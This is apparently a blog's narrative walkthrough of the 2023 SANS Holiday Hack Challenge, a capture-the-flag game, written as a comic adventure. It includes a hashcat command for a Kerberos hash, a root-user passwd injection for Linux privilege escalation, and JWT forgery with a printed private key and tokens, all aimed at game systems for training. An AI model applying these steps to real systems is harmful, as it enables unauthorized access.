Security Blog, Rants, Raves, Write-ups, and Code
2023 SANS Holiday Hack Challenge (KringleCon):
A Holiday Odyssey – 6 Geese A-Lei’ing
A Writeup Tale by Chris Ruggieri
Sitting at home as the holidays approach, I feel a sense of melancholy wash over me. I’m over-worked, stressed out, and feeling trapped. So, imagine my surprise when I get a phone call from Santa asking me to join him on his own Holiday Vacation in the Geese Islands. Sun, surf, warm weather, and a jolly old time were promised! Sounds like just my kind of vacation! I dust off my swim trunks, grab 100 bottles of SPF 1000 sunscreen (because I have the complexion of an Android flashlight) and hop on the boat sailing to the Geese Islands. The whole trip there I kept high spirits because I would finally catch a break and have some downtime. We were all of us deceived. No sooner do I dock at Christmas Island I spot the familiar face of Jingle Redford. Without a word, he hands me an envelope with its wax Santa seal still intact.
Here we go again. Somebody’s out to screw up Christmas and they appear to be using Large Language Models (LLMs) or, in the common tongue, AI Chatbots, to do it. This ought to be interesting at least. After reading the invitation, it’s time to speak to Jingle.
Jingle Ringford (Orientation):
Welcome to the Geese Islands and the 2023 SANS Holiday Hack Challenge! I'm Jingle Ringford, one of Santa's many elves. Santa asked me to meet you here and give you a short orientation to this festive event. Before you head back to your boat, I'll ask you to accomplish a few simple tasks. First things first, here's your badge! It's that starfish in the middle of your avatar. Great - now you're official! Click on the badge on your avatar. That's where you will see your Objectives, Hints, and Conversations for the Holiday Hack Challenge. We've also got handy links to some awesome talks and more there for you! Next, pick up that fishing pole over there in the sand. That will come in handy when you're sailing around the islands.
Fantastic! OK, one last thing. Click on the Cranberry Pi Terminal and follow the on-screen instructions.
First Terminal Challenge: Orientation
This is literally just entering the word “answer” in the upper terminal.
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Holiday Hack Orientation challenge!
Perfect! Your orientation is now complete! Head back to your boat or click on the anchor icon on the left of the screen to set sail for Frosty's Beach where Santa's waiting for you. I've updated your boat's compass to guide the way. As you sail to each island, talk to the goose of that island to receive a colorful lei festooning the masts on your ship. Safe travels my friend and remember, relax, enjoy the sun, and most importantly, have FUN!
Hopping back onto the boat I notice there’s already a bearing programmed into the nav system. Sweet! I’ve never been to the Geese Islands so that is super helpful. I follow the course and pull up to Frosty’s Beach dock. Disembarking the first two things I see are Santa and the Goose of Christmas Island, who doesn’t have much to say. Santa, however, is always up for a chat.
Santa (Frosty's Beach):
Welcome to the Geese Islands, fellow traveler! This one is called Christmas Island. Nooo ho ho, not that Christmas Island. After countless years of shivering and shaking through each holiday season, I thought to myself, "Why not trade the snowflakes for sunbeams, just once?" Oh, the North Pole has its charm, but the bones do yearn for a bit of warmth now and then. The notion was suggested by my good friend, Chat North Pole Technology, or as we like to call it, 'ChatNPT'. That's the one we use, but there's a whole slew of other AI platforms. You should try them out! It came to me describing palm trees and gentle waves, saying, "Santa, let your holidays take flight to Geese Islands, where the warmth isn't just a setting." "There, every day is a sunny scene straight out of a vintage film reel." I chuckled at the thought, my belly shaking like a bowl full of jelly. But the AI persisted, "Winter's best kept secret: the balmy breezes of Geese Islands!" And I must confess, the sound of that did stroke my beard with curiosity. So, I called a meeting with the elves, the reindeer, and Mrs. Claus, of course. The elves were all a-buzz with the idea of crafting toys with a view of the ocean! Thus, we packed up our sleighs and ChatNPT charted a course for the Geese Islands, a tropical paradise just north of the equator.. And I must say, there's something quite magical about a Christmas carol sung to the strum of a ukulele. After all, the magic of the holidays isn't in the snow or the cold, but in the love and the care that we put into each and every gift. So here's to trying new things, to following the sunshine, and to the Geese Islands, where the holiday cheer is sun-kissed and the Christmas spirit is as warm as the tropical breeze. And it's all thanks to a little nudge from ChatNPT. Now, why not start off your vacation with a snowball fight with Morcel, or check out my surf shack on the other end of the beach? However you decide to relax, be sure to soak in all the whimsical beauty of these magical islands, and enjoy the activities to the fullest!
Taking Santa’s advice, I figured “what the hell. Can’t hurt to have a little fun and I’ll have a chance to beat Santa in a snowball fight for bringing me here under false pretenses.” So, to Morcel we go to see if we can win ourselves a snowball fight.
Morcel Nougat (Frosty's Beach):
Hey there, I'm Morcel Nougat, elf extraordinaire! You won't believe this, but we're on a magical tropical island called Christmas Island, and it even has snow! I'm so glad ChatNPT suggested we come here this year! Santa, some elves, and I are having a snowball fight, and we'd love you to join us. Santa's really good, so trust me when I say it's way more fun when played with other people. But hey, if you can figure out a way to play solo by tinkering with client side variables or parameters to go solo mode, go for it! There's also ways to make the elves' snowballs do no damage, and all kinds of other shenanigans, but you didn't hear that from me. Just remember, it's all about having fun and sharing the joy of the holiday season with each other. So, are you in? We'd really love your company in this epic snowball battle!
Snowball Fight Challenge:
I was able to win by jumping in with another player and then I ran “santaObject.health = 0” in Developer Console and it removed half his health immediately. The other player and I were able to defeat him easily after that. If the other player has also entered “santaObject.health = 0” it would have gone even faster.
Replace this text with information about you and your business or add information that will be useful for your customers.
You're like a snowball fighting ninja! A real-life legend. Can I have your autograph!?
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Snowball Fight challenge!
HA! Beating Santa didn’t bring the warm fuzzy feeling I was hoping for. Let’s check out the Surf Shack.
Ginger Breddie (Santa's Surf Shack):
Hey, welcome to Santa's Surf Shack on tropical Christmas Island! I'm just hanging ten here, taking it easy while brushing up on my Linux skills. You ever tried getting into Linux? It's a super cool way to play around with computers. Can you believe ChatNPT suggested this trip to the Geese Islands this year? I'm so thrilled! Kudos to ChatNPT, eh? The sunshine, the waves, and my surfboard – simply loving it! So, what do you have planned? Care to join me in a Linux session?
Terminal Challenge: Linux 101
Just follow the directions. It’s pretty straightforward.
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Linux 101 challenge!
Wow, if your surfing skills are as good as your Linux skills, you could be winning competitions!
Now that’s wrapped up, I decide to sail around the Geese Islands (I’ve always loved the sea, after all) and see what else needs fixing. That’s when I come upon the Island of Misfit Toys, in particular, Scaredy Kite Heights’ dock. Mooring the ship to the dock, I walk down the gangway and run into Eve Snowshoes, another familiar sight.
Eve Snowshoes (Scaredy Kite Heights):
Greetings, fellow adventurer! Welcome to Scaredy-Kite Heights, the trailhead of the trek through the mountains on the way to the wonderful Squarewheel Yard! I'm Eve Snowshoes, resident tech hobbyist, and I hear Alabaster is in quite the predicament. Our dear Alabaster forgot his password. He's been racking his jingle bells of memory with no luck. I've been trying to handle this password recovery thing parallel to this hashcat business myself but it seems like I am missing some tricks. So, what do you say, chief, ready to get your hands on some hashcat action and help a distraught elf out?
Hashcat Challenge:
hashcat hash.txt password_list.txt -m 18200 -w 1 -u 1 --force -o result.txt --kernel-accel 1 --kernel-loops 1
elf@c6fb3d1df921:~$ cat result.txt
$krb5asrep$23$alabaster_snowball@XMAS.LOCAL:22865a2bceeaa73227ea4021879eda02$8f07417379e610e2dcb0621462fec3675bb5a850aba31837d541e50c622dc5faee60e48e019256e466d29b4d8c43cbf5bf7264b12c21737499cfcb73d95a903005a6ab6d9689ddd2772b908fc0d0aef43bb34db66af1dddb55b64937d3c7d7e93a91a7f303fef96e17d7f5479bae25c0183e74822ac652e92a56d0251bb5d975c2f2b63f4458526824f2c3dc1f1fcbacb2f6e52022ba6e6b401660b43b5070409cac0cc6223a2bf1b4b415574d7132f2607e12075f7cd2f8674c33e40d8ed55628f1c3eb08dbb8845b0f3bae708784c805b9a3f4b78ddf6830ad0e9eafb07980d7f2e270d8dd1966:IluvC4ndyC4nes!
Aha! Success! Alabaster will undoubtedly be grateful for our assistance. Onward to our next adventure, comrade! Feel free to explore this whimsical world of gears and steam!
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Hashcat challenge!
Walking around the Heights I see an old Saloon in the distance. Why not? I can go for a good Scotch right about now. Walking into the Saloon and whom do I see, Rose Mold the Troll staring back at me. I thought all the Trolls left for the Frostian home world two years ago.
Rose Mold (Ostrich Saloon):
What am I doing in this saloon? The better question is: what planet are you from? Yes, I’m a troll from the Planet Frost. I decided to stay on Earth after Holiday Hack 2021 and live among the elves because I made such dear friends here. Whatever. Do you know much about privilege escalation techniques on Linux? You're asking why? How about I'll tell you why after you help me. And you might have to use that big brain of yours to get creative, bub.
Linux Privesc Challenge:
find / -perm -u=s -type f 2>/dev/null finds us simplecopy.
Cat /etc/passwd >> /home/elf/passwd
Echo “root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash” >> passwd
Su root2 password = mrcake
Cd /root
Chmod +x runtoanswer
./runtoanswer
santa is the answer (all lowercase)
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Linux Privesc challenge!
Yup, I knew you knew. You just have that vibe. To answer your question of why from earlier... Nunya! But, I will tell you something better, about some information I... found. There's a hidden, uncharted area somewhere along the coast of this island, and there may be more around the other islands. The area is supposed to have something on it that's totes worth, but I hear all the bad vibe toys chill there. That's all I got. K byyeeeee. Ugh... n00bs...
I decide to sail around some more, just a little exploring is all, and come upon the Film Noir Island and sail into the Chiaroscuro City harbor, straight to the dock. Strolling down the pier, I see Wombley Cube, a wonderful Elf that we’ve seen every Christmas for the past 6 years.
Wombley Cube (Chiaroscuro City):
Wombley Cube here, welcome to Chiaroscuro City! Have you heard about my latest project? I've been so inspired by these wonderful islands I've decided to write a short story! The title? It's "The Enchanted Voyage of Santa and his Elves to the Geese Islands." Sounds exciting, right? Here, have this audiobook copy and enjoy the adventure at your convenience, my friend! Consider it a welcome gift from yours truly, to make your holiday even more delightful. Trust me, this captivating tale of fiction is going to take you on a magical journey you won't forget. Oh, and I promise it will provide some great entertainment while you explore the rest of Geese Islands! Hey, did you have a chance to listen to my audiobook yet? So, what did you think? I've got a pretty suave voice, right?
<Audio needed for Space Island Door Access Speaker>
I explore Chiaroscuro City a bit more and in a back alley come to a Private Investigator’s office in Gumshoe Alley. Let’s see what Tangle Coalbox has to say.
Tangle Coalbox (Gumshoe Alley PI Office):
Greetings, rookie. Tangle Coalbox of Kusto Detective Agency here. I've got a network infection case on Film Noir Island that needs your expertise. Seems like someone clicked a phishing link within a client's organization, and trouble's brewing. I'm swamped with cases, so I need an extra pair of hands. You up for the challenge? You'll be utilizing the Azure Data Explorer and those KQL skills of yours to investigate this incident. Before you start, you'll need to (create a free cluster). Keep your eyes peeled for suspicious activity, IP addresses, and patterns that'll help us crack this case wide open. Remember, kid, time is of the essence. The sooner we can resolve this issue, the better. If you run into any problems, just give me a holler, I've got your back. Good hunting, and let's bring this cyber criminal to justice. Once you've got the intel we need, report back and we'll plan our next move. Stay sharp, rookie.
KQL Kraken Challenge:
The answer is 25 and can be obtained using:
Employees
| where role == 'Craftsperson Elf'
| where hostname contains 'laptop'
These answers can be gathered using:
| where link == "http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx"
These answers can be gathered with:
Employees
| where name == "Alabaster Snowball"
This one requires 2 queries:
OutboundNetworkEvents
| where url == 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
FileCreationEvents
| where hostname == 'Y1US-DESKTOP'
These answers can be gathered with:
Employees
| where name == "Alabaster Snowball"
Inside the same query as before there are a few powershell encoded strings. One of them decodes to an ASCII character tableset. Some manual decoding later and we find giftbox.com
In another of those strings you will decode the base64 to show the –-wipeall flag.
The Last One is:
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the KQL Kraken Hunt challenge!
I had my doubts, but you've proven your worth. That phishing scheme won't trouble our client's organization anymore, thanks to your keen eye and investigatory prowess. So long, Gumshoe, and be careful out there.
Exploring even further, we come upon Shifty McShuffles. I don’t recall ever meeting Shifty. It’s entirely possible that I have, but I don’t remember them. Since I’ve never met a stranger, I stroll up to them and strike up a conversation.
Shifty McShuffles (Chiaroscuro City):
Hey there, stranger! Fancy a game of cards? Luck's on your side today, I can feel it. Step right up, test your wit! These cards could be your ticket to fortune. Trust me, I've got a good eye for winners, and you've got the look of luck about you. Plus, I'd wager you've never played this game before, as this isn't any ordinary deck of cards. It's made with Python. The name of the game is to bamboozle the dealer. So whad'ya think? Are you clever enough?
NaN Challenge:
This is a Burp Challenge. Change the cards to any numbers you want but intercept the play button push. Then change one number in the array to NaN. Repeat until you get to 10 and you’re done!
Well, you sure are more clever than most of the tourists that show up here. I couldn't swindle ya, but don't go telling everyone how you beat me! An elf's gotta put food on the table somehow, and I'm doing the best I can with what I got.
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Na’an challenge!
That was much easier than expected. Python can be such a tricky little snake. Fortunately, I’m a snake charmer, of sorts. Seeing there’s little more I can do in Chiaroscuro City, I slip back to the pier and the ship setting sail to explore more of these Islands. The next one I come upon is Pixel Island where a single Elf, Tinsel Upatree whom we’ve known for quite some time is walking around searching for something. Never one to let a friend suffer, I offer my assistance.
Tinsel Upatree (Driftbit Grotto):
I can't believe I was actually able to find this underground cavern! I discovered what looked liike an old pirate map in the attic of one of those huts in Rainraster Cliffs, and it actually led somewhere! But now that I've seen where it leads, I think this might've been a bad idea. This place is scary! Maybe you want to take it from here? There are 3 buried treasures in total, each in its own uncharted area around Geese Islands. I've been searching for a bit, but the mustiness down here is making me sneeze! Maybe you'll be able to find it. Here, use my Gameboy Cartridge Detector. Go into your items and test it to make sure it's still working. When you get close to the treasure, it'll start sounding off. The closer you get, the louder the sound. No need to activate or fiddle with it. It just works! I bet it's somewhere right... near... ACHOOO! If you find the treasure, come back and show me, and I'll tell you what I was able to research about it. Good luck!
GAME CARTRIDGE 1 Challenge:
Find the blocks that move around by singing and then move them into their appropriate positions. There’s one on the far left that needs to go out, up, and all the way towards the right vertical.
8bitelf.com & flag:santaconfusedgivingplanetsqrcode after you move the QR Code into position.
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Game Cartridges: Vol 1 challenge!
Whoa, you found it! What version is it? Did you know that many games had multiple versions released? Word is: volume 2 has 2 versions! You have all three? What a glorious collection!
Leaving Pixel Island and the Driftbit Grotto behind, I sail around and find a weird, but in a fun way, dock on what I learn is Steampunk Island. In particular, I slowly drift into Coggoggle Marina.
Ribb Bonbowford (Coggoggle Marina):
Hi there, could you do me a quick favor? Can you go and check on Alabaster Snowball for me? He’s at Rainraster Cliffs on Pixel Island. I heard some rumors he’s been experimenting with ChatNPT again and I’m a little worried about what he’s cooking up. Thank you so much! Please let me know what you find out.
I’ll return to Ribb after I’ve helped sort out Alabaster Snowball’s SSH/API Challenge to see what is needed. So back to the ship and off to Rusty Quay’s dock on Steampunk Island and keep exploring.
Angel Candysalt (Rusty Quay):
The name’s Angel Candysalt, the great treasure hunter! A euphemism? No, why do people always ask me that?? Anyways, I came here to nab the treasure hidden in this ship graveyard, only to discover it’s protected by this rusted maze. That must be why all these old ships are here. Their crew came to find the treasure, only to get lost in the labrynth. At least it’s obvious where this one is. See that shiny spot over to the right? That’s gotta be where it is! If only I had a bird’s eye view. But how to get there? Up? Down? Left? Right? Oh well, that’s your problem now! Come back if you can find your way to it, and I’ll tell you some secrets I’ve heard about this one.
Zoom out to find the path through the maze.
The life of a treasure hunter isn't easy, but it sure is exciting! Oh it's a video game, I love video games! But you've claimed this treasure, nicely done. Now, about those secrets I've been told. They're pretty cryptic, but they are. Hopefully that helps with something!
Game Cartridge 3 Challenge:
This challenge was INSANE. Firstly, find the addresses that change when you get coins. I used BGB Emulator and the Cheat Search function within that. The Addresses are split between ones, tens, and hundred and are 3 – 2 – 3 respectively, meaning 3 addresses for the ones, 2 for the tens, and 3 for the hundreds. I used 325 and then upped each one by one. Hundreds = C0F8=0004 CBA2=0004 D932=0004, Tens = C12C=03 CB9C=03, and Ones = C160=06 CB9E=06 D92C=06. Get to the large gap (using F2 Quick Saves often) then change those addresses to 09 (Hex equivalent of 9) giving you 999 coins and creating 2 platforms. After jumping across, enter the cave to meet Tom Liston and complete the challenge!
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Game Cartridges: Vol 3 challenge!
Now that I have finished another cartridge, it’s time to sail around to Brass Bouy Port on Steampunk Island which brings me face to face with Bow Ninecandle. Let’s see what they are needing. It looks like they’re doing the “I need to make a head call” (use the restroom in layman’s terms) dance. This might be something that needs to be done quickly.
Bow Ninecandle (Brass Bouy Port):
Hey there! I'm Bow Ninecandle, and I've got a bit of a... 'pressing' situation. You see, I need to get into the lavatory, but here's the twist: it's secured with a combination padlock. Talk about bad timing, right? I could really use your help to figure this out before things get... well, urgent. I'm sure there are some clever tricks and tips floating around the web that can help us crack this code without too much of a flush... I mean fuss. Remember, we're aiming for quick and easy solutions here - nothing too complex. Once we've gathered a few possible combinations, let's team up and try them out. I'm crossing my legs - I mean fingers - hoping we can unlock this door soon. After all, everyone knows that the key to holiday happiness is an accessible lavatory! Let's dive into this challenge and hopefully, we won't have to 'hold it' for too long! Ready to help me out?
Faster Lock Combination Challenge:
In Developer Tools Console, examine the code and call the unlock function. moveLockIntoUnlockedPosition() and Voila! Unlocked.
Oh, thank heavens! You're a lifesaver! With your knack for cracking codes, we've just turned a potential 'loo catastrophe' into a holiday triumph!
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Faster Lock Combination challenge!
Chimney Scissorsticks (Brass Bouy Port):
Heya, think you could help Piney Sappington on Rainraster Cliffs on Pixel Island and then give me a hand?
So, let’s hop back to the ship and go to Raincaster Cliffs on Pixel Island and see what Piney Sappington needs.
Piney Sappington (Rainraster Cliffs):
Hey there, friend! Piney Sappington here. You look like someone who's good with puzzles and games. I could really use your help with this Elf Hunt game I'm stuck on. I think it has something to do with manipulating JWTs, but I'm a bit lost. If you help me out, I might share some juicy secrets I've discovered. Let's just say things around here haven't been exactly... normal. So, what do ya say? Are you in? Oh, brilliant! I just know we'll crack this game together. I can't wait to see what we uncover, and remember, mum's the word! Thanks a bunch! Keep your eyes open and your ears to the ground.
Super easy! In Developer Tools, make sure that your console tab is using Elf Hunt. Enter score = 100 to the console line, start the game and hit enter on the console. Easy Peasy
You’ll need this. It shows the role for the communications tower needs to be “GeeseIslandsSuperChiefCommunicationsOfficer”.
Well done! You've brilliantly won Elf Hunt! I couldn't be more thrilled. Keep up the fine work, my friend! What have you found there? The Captain's Journal? Yeah, he comes around a lot. You can find his comms office over at Brass Buoy Port on Steampunk Island.
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Elf Hunt challenge!
Sailing back to Brass Bouy Port, we speak to Chimney Scissorsticks again.
Chimney Scissorsticks (Brass Bouy Port):
Ahoy there, I'm Chimney Scissorsticks! You may have noticed some mischief-makers planning to stir up trouble ashore. They've made many radio broadcasts which the captain has been monitoring with his new software defined radio (SDR). The new SDR uses some fancy JWT technology to control access. The captain has a knack for shortening words, some sorta abbreviation trick. Not familiar with JWT values? No worries; just think of it as a clue-solving game. I've seen that the Captain likes to carry his journal with him wherever he goes. If only I could find the planned "go-date", "go-time", and radio frequency they plan to use. Remember, the captain's abbreviations are your guiding light through this mystery! Once we find a JWT value, these villains won't stand a chance. The closer we are, the sooner we'll be thwarting their pesky plans! We need to recreate an administrative JWT value to successfully transmit a message. Good luck, matey! I've no doubts about your cleverness in cracking this conundrum!
Captain’s Comms Challenge:
First, look at all the books and papers on the desk and you’ll find 2 paths: jwtDefault/rMonitor.tok (which is the radioMonitor Role token) and /jwtDefault/keys/capsPubKey.key. In RESTER, add the JustWatchThisRole and Authorization headers with the normal JWT from your initial access and you will get the token and key.
Now, let’s see if it’s as easy to get radio decoder at /jwtDefault/rDecoder.tok. Yep! It is!
Now that we’re radioDecoder Role, we can watch the CW Decoder and find that the Captain keeps his private key in TH3CAPSPR1V4T3F0LD3R!!
Next we watch the Audio-Text Decoder and find that 88323 and 12249 and 16009 are important for some reason
Last, we watch the Radio Fax decoder and find Freq 10426 Hz
So, we can guess the Private Key is in /jwtDefault/keys/TH3CAPSPR1V4T3F0LD3R/capsPrivKey.keyLast, we watch the Radio Fax decoder and find Freq 10426 Hz
Captain’s Public Key
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsJZuLJVB4EftUOQN1Auw
VzJyr1Ma4xFo6EsEzrkprnQcdgwz2iMM76IEiH8FlgKZG1U0RU4N3suI24NJsb5w
J327IYXAuOLBLzIN65nQhJ9wBPR7Wd4Eoo2wJP2m2HKwkW5Yadj6T2YgwZLmod3q
n6JlhN03DOk1biNuLDyWao+MPmg2RcxDR2PRnfBartzw0HPB1yC2Sp33eDGkpIXa
cx/lGVHFVxE1ptXP+asOAzK1wEezyDjyUxZcMMmV0VibzeXbxsXYvV3knScr2WYO
qZ5ssa4Rah9sWnm0CKG638/lVD9kwbvcO2lMlUeTp7vwOTXEGyadpB0WsuIKuPH6
uQIDAQAB
-----END PUBLIC KEY-----
Radio Monitor Token
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJISEMgMjAyMyBDYXB0YWluJ3MgQ29tbXMiLCJpYXQiOjE2OTk0ODU3OTUuMzQwMzMyNywiZXhwIjoxODA5OTM3Mzk1LjM0MDMzMjcsImF1ZCI6IkhvbGlkYXkgSGFjayAyMDIzIiwicm9sZSI6InJhZGlvTW9uaXRvciJ9.f_z24CMLim2JDKf8KP_PsJmMg3l_V9OzEwK1E_IBE9rrIGRVBZjqGpvTqAQQSesJD82LhK2h8dCcvUcF7awiAPpgZpcfM5jdkXR7DAKzaHAV0OwTRS6x_Uuo6tqGMu4XZVjGzTvba-eMGTHXyfekvtZr8uLLhvNxoarCrDLiwZ_cKLViRojGuRIhGAQCpumw6NTyLuUYovy_iymNfe7pqsXQNL_iyoUwWxfWcfwch7eGmf2mBrdEiTB6LZJ1ar0FONfrLGX19TV25Qy8auNWQIn6jczWM9WcZbuOIfOvlvKhyVWbPdAK3zB7OOm-DbWm1aFNYKr6JIRDLobPfiqhKg
Radio Decoder Token
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJISEMgMjAyMyBDYXB0YWluJ3MgQ29tbXMiLCJpYXQiOjE2OTk0ODU3OTUuMzQwMzMyNywiZXhwIjoxODA5OTM3Mzk1LjM0MDMzMjcsImF1ZCI6IkhvbGlkYXkgSGFjayAyMDIzIiwicm9sZSI6InJhZGlvRGVjb2RlciJ9.cnNu6EjIDBrq8PbMlQNF7GzTqtOOLO0Q2zAKBRuza9bHMZGFx0pOmeCy2Ltv7NUPv1yT9NZ-WapQ1-GNcw011Ssbxz0yQO3Mh2Tt3rS65dmb5cmYIZc0pol-imtclWh5s1OTGUtqSjbeeZ2QAMUFx3Ad93gR20pKpjmoeG_Iec4JHLTJVEksogowOouGyDxNAagIICSpe61F3MY1qTibOLSbq3UVfiIJS4XvGJwqbYfLdbhc-FvHWBUbHhAzIgTIyx6kfONOH9JBo2RRQKvN-0K37aJRTqbq99mS4P9PEVs0-YIIufUxJGIW0TdMNuVO3or6bIeVH6CjexIl14w6fg
Captain’s Private Key
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCwlm4slUHgR+1Q
5A3UC7BXMnKvUxrjEWjoSwTOuSmudBx2DDPaIwzvogSIfwWWApkbVTRFTg3ey4jb
g0mxvnAnfbshhcC44sEvMg3rmdCEn3AE9HtZ3gSijbAk/abYcrCRblhp2PpPZiDB
kuah3eqfomWE3TcM6TVuI24sPJZqj4w+aDZFzENHY9Gd8Fqu3PDQc8HXILZKnfd4
MaSkhdpzH+UZUcVXETWm1c/5qw4DMrXAR7PIOPJTFlwwyZXRWJvN5dvGxdi9XeSd
JyvZZg6pnmyxrhFqH2xaebQIobrfz+VUP2TBu9w7aUyVR5Onu/A5NcQbJp2kHRay
4gq48fq5AgMBAAECggEATlcmYJQE6i2uvFS4R8q5vC1u0JYzVupJ2sgxRU7DDZiI
adyHAm7LVeJQVYfYoBDeANC/hEGZCK7OM+heQMMGOZbfdoNCmSNL5ha0M0IFTlj3
VtNph9hlwQHP09FN/DeBWruT8L1oauIZhRcZR1VOuexPUm7bddheMlL4lRp59qKj
9k1hUQ3R3qAYST2EnqpEk1NV3TirnhIcAod53aAzcAqg/VruoPhdwmSv/xrfDS9R
DCxOzplHbVQ7sxZSt6URO/El6BrkvVvJEqECMUdON4agNEK5IYAFuIbETFNSu1TP
/dMvnR1fpM0lPOXeUKPNFveGKCc7B4IF2aDQ/CvD+wKBgQDpJjHSbtABNaJqVJ3N
/pMROk+UkTbSW69CgiH03TNJ9RflVMphwNfFJqwcWUwIEsBpe+Wa3xE0ZatecEM9
4PevvXGujmfskst/PuCuDwHnQ5OkRwaGIkujmBaNFmpkF+51v6LNdnt8UPGrkovD
onQIEjmvS1b53eUhDI91eysPKwKBgQDB5RVaS7huAJGJOgMpKzu54N6uljSwoisz
YJRY+5V0h65PucmZHPHe4/+cSUuuhMWOPinr+tbZtwYaiX04CNK1s8u4qqcX2ZRD
YuEv+WNDv2e1XjoWCTxfP71EorywkEyCnZq5kax3cPOqBs4UvSmsR9JiYKdeXfaC
VGiUyJgLqwKBgQDL+VZtO/VOmZXWYOEOb0JLODCXUdQchYn3LdJ3X26XrY2SXXQR
wZ0EJqk8xAL4rS8ZGgPuUmnC5Y/ft2eco00OuzbR+FSDbIoMcP4wSYDoyv5IIrta
bnauUUipdorttuIwsc/E4Xt3b3l/GV6dcWsCBK/i5I7bW34yQ8LejTtGsQKBgAmx
NdwJpPJ6vMurRrUsIBQulXMMtx2NPbOXxFKeYN4uWhxKITWyKLUHmKNrVokmwelW
Wiodo9fGOlvhO40tg7rpfemBPlEG405rBu6q/LdKPhjm2Oh5Fbd9LCzeJah9zhVJ
Y46bJY/i6Ys6Q9rticO+41lfk344HDZvmbq2PEN5AoGBANrYUVhKdTY0OmxLOrBb
kk8qpMhJycpmLFwymvFf0j3dWzwo8cY/+2zCFEtv6t1r7b8bjz/NYrwS0GvEc6Bj
xVa9JIGLTKZt+VRYMP1V+uJEmgSnwUFKrXPrAsyRaMcq0HAvQOMICX4ZvGyzWhut
UdQXV73mNwnYl0RQmBnDOl+i
-----END PRIVATE KEY-----
Captain's GeeseIslandsSuperChiefCommunicationsOfficer Token
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJISEMgMjAyMyBDYXB0YWluJ3MgQ29tbXMiLCJpYXQiOjE2OTk0ODU3OTUuMzQwMzMyNywiZXhwIjoxODA5OTM3Mzk1LjM0MDMzMjcsImF1ZCI6IkhvbGlkYXkgSGFjayAyMDIzIiwicm9sZSI6IkdlZXNlSXNsYW5kc1N1cGVyQ2hpZWZDb21tdW5pY2F0aW9uc09mZmljZXIifQ.N-8MdT6yPFge7zERpm4VdLdVLMyYcY_Wza1TADoGKK5_85Y5ua59z2Ke0TTyQPa14Z7_Su5CpHZMoxThIEHUWqMzZ8MceUmNGzzIsML7iFQElSsLmBMytHcm9-qzL0Bqb5MeqoHZYTxN0vYG7WaGihYDTB7OxkoO_r4uPSQC8swFJjfazecCqIvl4T5i08p5Ur180GxgEaB-o4fpg_OgReD91ThJXPt7wZd9xMoQjSuPqTPiYrP5o-aaQMcNhSkMix_RX1UGrU-2sBlL01FxI7SjxPYu4eQbACvuK6G2wyuvaQIclGB2Qh3P7rAOTpksZSex9RjtKOiLMCafTyfFng
And we were right! Now time to forge a JWT token. I used https://10015.io/tools/jwt-encoder-decoder to create a token signed with the Captain’s Private Key and we’re into the Comms System. Enter the 10426 Hz into the Frequency window. The Date and Time must be in the Audio-Text decoder. I was partially right. The Background splash page said the go-time was 4 hours BEFORE the miscreants planned their raid. So, 1224 (Christmas Eve) and 1200 (4 hours before 1600). BOOM!
So, we can guess the Private Key is in /jwtDefault/keys/TH3CAPSPR1V4T3F0LD3R/capsPrivKey.keyLast, we watch the Radio Fax decoder and find Freq 10426 Hz
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the The Captain's Comms challenge!
Brilliant work! You've outsmarted those scoundrels with finesse!
Now that’s done, we sail back to Rainraster Cliffs on Pixel Island to see about things there. Let’s see where these ladders lead to back at Raincaster Cliffs. We pass Piney Sappington along the way again. Upon reaching the summit, we see a wonderful tree house and our old friend Alabaster Snowball standing outside the tree house.
Alabaster Snowball (Rainraster Cliffs):
Hey there! I’m currently a bit swamped with this Azure deployment. Once I’m done I’ll tell you about it. It’s pretty awesome! You’ll need a bit of Azure knowledge though. Sparkle Redberry can help you get up to speed on that. You can find her at the Rudolph’s Rest Resort on Christmas Island.
So we need to find Sparkle Redberry at Rudolph’s Rest Resort on Christmas Island. Sailing there we see Noel Boetie first and then Sparkle on the far left side.
Sparkle Redberry (Rudolph’s Rest Resort):
Hey, Sparkle Redberry here! So, I’ve been trying to learn about Azure and the Azure CLI and it’s driving me nuts. Alabaster Snowball decided to use Azure to host some of his fancy new IT stuff on Geese Islands, and now us elves have to learn it too. Anyway, I know it’s important and everyone says it’s not as difficult as it seems, but honestly it still feels like quite a challenge for me. Alabaster sent us this Azure CLI reference as well. It’s super handy, he said. Honestly, it just confuses me even more. If you can spare a moment, would you mind giving me a hand with this terminal? I’d be really grateful! Pretty please, with holly leaves on top!
Azure 101 Challenge:
Step 1 = az help | less
Step 2 = az account show | less
Step 3 = az group list
Step 4 = az functionapp list --resource-group "northpole-rg1"
Step 5 = az vm list --resource-group "northpole-rg2"
Step 6 = az vm run-command invoke -g northpole-rg2 -n NP-VM1 --command-id RunShellScript --scripts "ls"
Wow, you did it! It makes quite a bit more sense to me now. Thank you so much! That Azure Function App URL you came across in the terminal looked interesting. It might be part of that new project Alabaster has been working on with the help of ChatNPT. Let me tell you, since he started using ChatNPT he's been introducing a lot of amazing innovation across the islands. Knowing Alabaster, he'll be delighted to tell you all about it! I think I last saw him on Pixel island. By the way, as part of the Azure documentation he sent the elves, Alabaster also noted that if Azure CLI tools aren't available in an Azure VM we should use the Azure REST API instead. I'm not really sure what that means, but I guess I know what I'll be studying up on next.
ACHIEVEMENT UNLOCKED: Congratulations! You have completed the Azure 101 challenge!
